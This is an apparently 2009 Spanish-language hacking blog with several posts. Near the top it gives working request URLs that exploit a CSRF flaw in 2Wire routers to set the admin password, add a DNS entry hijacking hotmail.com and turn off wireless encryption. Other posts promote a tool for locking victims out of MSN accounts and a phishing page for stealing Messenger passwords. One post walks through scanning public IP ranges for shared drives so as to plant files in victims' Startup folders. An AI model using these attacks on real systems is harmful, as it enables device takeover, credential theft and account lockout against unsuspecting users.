http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
etc...
Modelos Vulnerables: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Software: v3.17.5, 3.7.1, 4.25.19, 5.29.51
martes, 10 de marzo de 2009
Dsl-DoS
miércoles, 4 de marzo de 2009
Vulnerabilidades en ruteadores 2Wire (algunas versiones)
Software: 3.17.5, 3.7.1, 5.29.51 Contraseña No establecida
http://www.2wire.com fue Notificado
I. Información
-------------
Son los ruteadores más populares de México y su
consola de administración web no
tiene password por defecto.
II. Vulnerabilidad
----------------
Es posible hacer que el cliente realice una petición al
ruteador y modifique
cualquier configuración.
No valida POST ni Referer ni nada.
III. "Exploit"
--------
Solo necesitamos hacer que el cliente realice alguna petición
con la configuración
que queramos.
[ejemplos]
Ponerle password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_
POST&THISPAGE=A05&NEXTPAGE=A05_
POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_
CONF=NUEVOPASS
Agregar un registro DNS (74.125.19.99 www.hotmail.com):
http://192.168.1.254/xslt?PAGE=J38_
SET&THISPAGE=J38&NEXTPAGE=J38_
SET&NAME=www.hotmail.com&ADDR=74.125.19.99
Deshabilitar Autenticación inalámbrica
http://192.168.1.254/xslt?PAGE=C05_
POST&THISPAGE=C05&NEXTPAGE=C05_
POST&NAME=encrypt_enabled&VALUE=0
miércoles, 18 de febrero de 2009
Toda Internet En Peligro
Toda internet en peligro, esto no es un juego, ultimamente la gente ya utiliza mas lo que es internet y gracias ha esto ha ido avanzando de un paso muy grande lo que es la inseguridad en los sistemas.
En un principo cuando empezavan los Exploits, Bugs, Errores en Sistemas etc .... etc solo afectavan directamente a sistemas Windows X.x..x.x.x..x en la actualidad ya no existe eso,,, bien es como si ubiera una falta de respeto asi algunos S.O. como lo son Linux, MacOS, Solaris etctct..
Y todo esto a quien se debe ????
bien se debe a que todos nos hemos acostubrado a internet.....
y como jala internet o que es ????
Internet es la red de REDES donde se encuentran conectadas un sin fin numero de ordenadores o PC's ,,,
Internet para que funcione Se necesita diferentes tipos de dispocitivos y protocolos .... que funcionan atraves de puertos..
En algunos dispositovos de red existen Bugs, Exploits etc.
Hoy en dia esta de moda phishing para sacar cuentas de Bancos de correos etc....
Phishing son paginas falsas..
Existen tecnicas de todo tipo para extraer informacion de la red ,///// Que medio (cables, inalambrica).
Spoofing, Sniffer, Phishing, Exploit etc.
Phishing
es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea[1] o incluso utilizando también llamadas telefónicas.
Phishing
En informática, un packet sniffer es un programa de captura de las tramas de red. Generalmente se usa para gestionar la red con una finalidad docente, aunque también puede ser utilizado con fines maliciosos.
Exploit
Exploit (del inglés to exploit, explotar o aprovechar) es una pieza de software, un fragmento de datos, o una secuencia de comandos que se aprovecha de un error, fallo o vulnerabilidad, a fin de causar un comportamiento no deseado o imprevisto en los programas informáticos, hardware, o algo electrónico (por lo general computarizado). Con frecuencia, esto incluye cosas tales como la violenta toma de control de un sistema de cómputo o permitir la escalada de privilegios o un ataque de denegación de servicio..
domingo, 8 de febrero de 2009
Como se da la Comunicacion -I-NFINITU-M-
vamos a dar una breve explicacion de como es el proceso de conexion para salir a internet....
en este caso escribo T-e-l-m-e-x e --I-N-F-I-N-I-T-U-M-- asi por aquello de politicas de empresa y para no tener problemas y no aparesca en google directamente o y en especial por los cops
T-e-l-m-e-x nos ofrece un modem --- ok este puede ser de diferente marca o empresa ....
existen:
-2wire (diferentes modelos)
-SpeedStream
-Thomson
-y el mas nuevo el porta retrato HUAWEI
cada uno de estos es los q nos ayudan a conectarnos a internet..... sin mas rodeos aqui un proceso de como se lleva a cabo la conexion..
PC-->MODEM-->MICRO/FILTRO-->ROCETA/TELEFONICA-->DSLAM-->ATM-->SERVIDORES/RADIUS//AAA-PUERTOS 25-587 PARA CORREOS-->ROUTER-->SERVIDORES/DNS-->ROUTER--> NUVE INTERNET
aqui cabe destacar algo muy importante como funcionan cada uno de los aparatos que se acaban de mensionar, no voy a entrar en mucha explicacion asi rapido y sencillo..
DSLAM:
Es un multiplexor localizado en la central telefónica que proporciona a los abonados acceso a los servicios DSL sobre cable de par trenzado de cobre.El dispositivo separa la voz y los datos de las líneas de abonado.
Esta definicion que doy aqui no es la qu edefine exactamente el ATM pero en el caso de i-nfinutu-m es la que nos proporsiona los canales de comunicacion y la que nos asigna las velosidades de subida y la de entrada para el caso de i-nfinutu-m no da dos canales para el VPI y VCI los cules son // VPI:8 VCI:81 // VPI:8 VCI:35
SERVIDORES RADIUS
Estos servidores son los que autentifican el ususrio y el password sean correctos para utilizar la linea como acceso a internet, bueno en los modems 2wire modelos 2000 para arriba ya vienen preconfigurado para navegar en internet.. sin poner o configurar el usuario y la contrasena en el modem..
Nota: la contrasena para accesar a internet mediante un modem no es lo mismo que la WebKEY que es para accesar al modem.
SERVIDORES DE DNS:
Etos servodores son los que contienen toda la informacion sobre las ips y nombres de los host
nuestra ultima parada es --------------------------------------->>>>>>>>>>>>
NUVE DE INTERNET
emuladores de los portales de los Modems
By Mr.Anonimo
sábado, 7 de febrero de 2009
Chau MSN v1.0 OPEN SOURCE 14
Para bloquear una cuenta lo unico que tienen que hacer es colocar el msn de la victima y poner bloquear cuenta, esperar que termine de cargar todo y dejarlo abierto al programa, o minimizado. La proxima ves que la victima intente entrar al msn le saldra un cartel como este, y no podra iniciar secion:
Hay que tener en cuenta que la cuenta permanesera bloqueada mientras el programa este abierto y en el estado cuenta bloqueada.
Si se intenta bloquear una cuenta de alguien que este online, esta se bloqueara pero cuando cierre secion y vuelva a iniciarla, No hara que cierre secion.
Funcionamiento
El funcionamiento del programa es muy simple, lo que se hace es loguearse con la cuenta que se puso con passwords incorrectos, entonces el servidor de hotmail bloquea la cuenta para evitar que se realizen ataques por fuerza bruta.
ACTUALIZADO 16/04/08
Codigo fuente
Chau MSN esta programado en visual basic y es de codigo abierto desde ahora, ya libere el codigo fuente para que vean como funciona mas o menos y para todos los que quieran modificar el programa. Pueden ir haciendo las modificaciones que quieran y me lo van pasando asi voy actualizando el programa, no nesesariamente tiene que bloquear cuentas.
Les dejo una captura del VB
Descarga:
Chau MSN v1.0 (miarroba)
Chau MSN v1.0 (rapidshare)
Chau MSN v1.0 (megaupload)
Source Chau MSN v1.0 (miarroba)
Source Chau MSN v1.0 (rapidshare)
martes, 3 de febrero de 2009
BackTrack
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general.
Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.
WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix.
Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org
Puede encontrarse más información en la página de Backtrack, desde donde también es posible descargarla.
Entre las muchas herramientas del backtrack, quiero resaltar el excelente soporte a tarjetas de red wireless, también tiene incluidas las herramientas para análisis de redes wireless más populares, como Kismet, Air crack, Airsnort entre otras, de hecho, la principal razón por la que me intereso el backtrack en primer lugar, fue por la posibilidad de ejecutar Wireshark, para análisis de redes wireless, ya que el soporte para estos análisis es mucho mejor en Linux y hasta el momento no me ha defraudado, lo he utilizado en un par de veces para estos propósitos con análisis sencillos sin problemas.
Modems T--e-l-m-e-x
-Maxcom
-Cablecom
etc. etc (Axtel)
Algo muy importante que cabe destacar en T--e-l-m-e-x son sus diferentes modems que han existido e implementado como lo son:
-SpeedStream
-2wire
--Thomson
SoftPerfect Network Scanner
"Primero que nada Netbios significa Network Basic Input Output system (Sistema basico de red de entrada y salida), esto no es considerado un bug, ni un backdoor ni nada asi q yo no lo considero reto, y por lo tanto no lo considero hacking"
Generalmente son pcs de personas que comparten algunos de sus archivos no importantes como musica o imagenes. Pero en muchos de los casos se encuentran pcs que estan compartiendo todos sus discos (grave error).
Aunque no se puede ejecutar archivos con este metodo se puede colar un "archivo" en la carpeta C:\Documents and Settings\Administrador\Menú Inicio\Programas\Inicio, asi cuando se reinicie la pc se ejecutara ese "archivo".
Otro metodo consite en infectar o reemplazar archivos que se utilizen mucho en esa pc, como por ejemplo el msno el IE, asi cada vez que la victima haga click en el msn o el IE se ejecute nuestro "archivo".
Su uso es muy simple, primero seleccionamos un rango de ips, yo seleccione un rango grande desde 190.30.0.0 hasta 190.31.0.0 (son pcs de arnet, de argentina), despues hacemos click en "Start Scanning".. y empezaran a salir todas las pcs que esten conectadas a internet.
La mayoria de estas pcs no estaran compartiendo archivos, las que si lo esten tienen que tener un [>]o un [+] a la izquierda de la imagen de su pc.
Entonces cuando queremos ver que archivos comparte una pc hacemos click en esa pestañita y saldran las carpetas. Para ver que contiene cada carpeta hacemos click en la misma y apareceran todos sus archivos y subcarpetas, vale aclarar que se puede descargar, subir y ejecutar archivos en nuestra pc.
Descarga: SoftPerfect Network Scanner 3.8 (pagina oficial)
Manual: SoftPerfect Network Scanner Online Manual
Pagina oficial: www.softperfect.com
lunes, 2 de febrero de 2009
Lanzador Quien te admitio
Aqui una ves mas un lanzador para la raza--
quien me admitio al messenger jajaja ok aqui lo dejamos
Como Funciona:
En el enlace encontraremos un menu
--index
--Buscar correo
ps bueno como todo con mucho ingenio enviaremos a una victima el enlace
que nos aparece en index y le enviamos un buen choro por messenger o correo
cuando pensemos q ya callo nuestra victima nos dirigimos a la parte
--Buscar correo
y buscamos el correo
y listo nos da la contrasena
diviertanse
jajajaj su amigo Anonimo
Comandos Basicos de Windows
access.cpl : Para Accesibilidad y controles.
wuaucpl.cpl : Para las actualizaciones automáticas.
compmgmt.msc : Para la administración de equipos
devmgmt.msc : Para la administración del dispositivos
taskmgr : Para el administrador de tareas
control admintools : Las Herramientas administrativas
magnify : El ampliador de Windows osea la lupa.
hdwwiz.cpl : Asistente para añadir hardware
appwiz.cpl : Para Instalar/desinstalar programas
shutdown : Para apagar Windows
mmsys.cpl : Para el audio y sonido
ac3filter.cpl : Para audio, abrir el AC3 Filter (Si está instalado. Es una especie de ecualizador de audio)
notepad : Para el Bloc de notas
fsquirt : Para el Bluetooth (Asistente de transferencia)
findfast.cpl : Para la búsqueda rápida
eudcedit : Para caracteres privados, Editor
calc : Para la calculadora
control folders : Para opciones de la carpeta
certmgr.msc : Certificados (gestión)
charmap : Caracteres (Mapa)
fsmgmt.msc : Para ver Carpetas compartidas
chkdsk : Check Disk Utility (Comprobación del Disco Duro)
clipbrd : Clipboard Viewer (Para visualizar el portapapeles)
cmd : Command Prompt (Pantalla de comandos, como el antiguo MsDos)
dcomcnfg : Componentes, servicios
sigverif : Comprobación de la firma del archivo
verifier : Controladores (drivers), administrador del comprobador de...
timedate.cpl : Fecha y hora, propiedades
ddeshare : Recursos compartidos DDE
dxdiag : Direct X, diagnóstico de problemas
directx.cpl : DirectX, panel de control (Si está instalado)
diskmgmt.msc : Para la Administraciob de discos
diskpart : Administrador de particiones de disco
dfrg.msc : Desfragmentador del disco
cleanmgr : Liberador de espacio del disco
drwtsn32 : Dr. Watson (utilidad de diagnóstico del sistema)
powercfg.cpl : opciones y configuración de la EnergÃa
sticpl.cpl : Escáneres y Cámaras
mstsc : Escritorio remoto
control fonts :Fuentes
fonts : Fuentes, carpeta dónde están instaladas las fuentes.
gpedit.msc : Group Policy Editor (sólo en XP profesional)
iexpress : Iexpress Wizard
printers : Carpetas de impresoras
control printers : Impresoras y Faxes
ciadv.msc : Index Server, servicio
inetcpl.cpl : Internet, propiedades
ipconfig /all : IP Configuración (Muestra la configuración de las conexiones)
ipconfig /displaydns : IP Configuración (Muestra la caché de resolución de DNS - recomendable mirar todo lo que hay)
ipconfig /flushdns : IP Configuración (Borra las DNS Cache Contents)
ipconfig /release : IP Configuración (Lanza todas las conexiones)
ipconfig /renew : IP Configuración (Renueva todas las conexiones)
ipconfig /registerdns : IP Configuración (Refresca DHCP & Re-Registra DNS)
ipconfig /showclassid : IP Configuración (Muestra DHCP Class ID)
ipconfig /setclassid : IP Configuración (Modifica DHCP Class ID)
jpicpl32.cpl : Java, Panel de control (Si está instalado)
winmine : Juego de buscaminas
freecell : Juego de carta blanca
mshearts : Juego de corazones
sol : Juego de solitario
spider : Juego de spider
joy.cpl : Controladores de Juegos
ntmsmgr.msc : Medios de almacenamiento extraÃbles
ntmsoprq.msc : Medios de almacenamiento extraÃbles, solicitudes del operador
winchat : Microsoft Chat
control mouse : Propiedades del Ratón
control netconnections : Conexiones de Red
netsetup.cpl : Asistente para la configuracion de Red
nvtuicpl.cpl : Nview Desktop Manager (Si está instalado. Son unos controladores de nVidia)
packager : Empaquetador de Objectos
odbccp32.cpl : ODBC Data Source Administrator
osk : Teclado en pantalla (útil si se te estropea el teclado)
control desktop :Propiedades de la Pantalla
control color : Si se quiere que aparezca la pestaña de control de colores
password.cpl : Propiedades de las Password
intl.cpl : Configuración Regional
regedit : Editor de Registro
perfmon.msc : Rendimiento del sistema, monitor
rsop.msc : Resultant Set of Policy (XP Profesional)
logoff : Salir de Windows (para cambiar de usuario)
wscui.cpl : Security Center
secpol.msc : Seguridad, configuración local
services.msc : Servicios
sysedit : Editor de configuración del Sistema
sysdm.cpl : Propiedades del Sistema
msconfig : Utilidad de configuración del Sistema
sfc /scannow : Utilidad de comprobación de archivos del Sistema (Escanea inmediatamente)
sfc /scanonce : Utilidad de comprobación de archivos del Sistema (Escanea una vez en el siguiente encendido)
sfc /scanboot : Utilidad de comprobación de archivos del Sistema (Escanea en cada encendido)
sfc /revert : Utilidad de comprobación de archivos del Sistema (Vuelve a la configuración por defecto)
sfc /purgecache : Utilidad de comprobación de archivos del Sistema (Purga el archivo caché)
sfc /cachesize=x : Utilidad de comprobación de archivos del Sistema (Configura el archivo caché a la talla x)
cliconfg : Configuración de SQL
eventvwr.msc : Visor de Sucesos
tasklist : Lista de tareas (XP profesional)
taskkill /PID : Terminar tarea (XP profesional)
control schedtasks : Tareas programadas
control keyboard : Propiedades del teclado
telephon.cpl : Ppciones de teléfono y modem
telnet : Cliente Telnet
nusrmgr.cpl : Administrador de cuenta usuario
control userpasswords2 : Administrador de cuentas de Usuarios
control userpasswords : Cuentas de usuarios
lusrmgr.msc : Usuarios locales y grupos
utilman : Utilidades, administrador
firewall.cpl : Firewall de Windows
wmimgmt.msc : Windows Management Infrastructure
syskey : Windows System Security Tool
wupdmgr : Windows Update
tourstart : Paseo por Windows XP
write : Para abrir Wordpad